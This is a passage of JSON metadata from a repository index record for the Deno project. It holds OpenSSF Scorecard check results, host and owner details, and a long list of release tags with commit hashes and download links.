.devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denola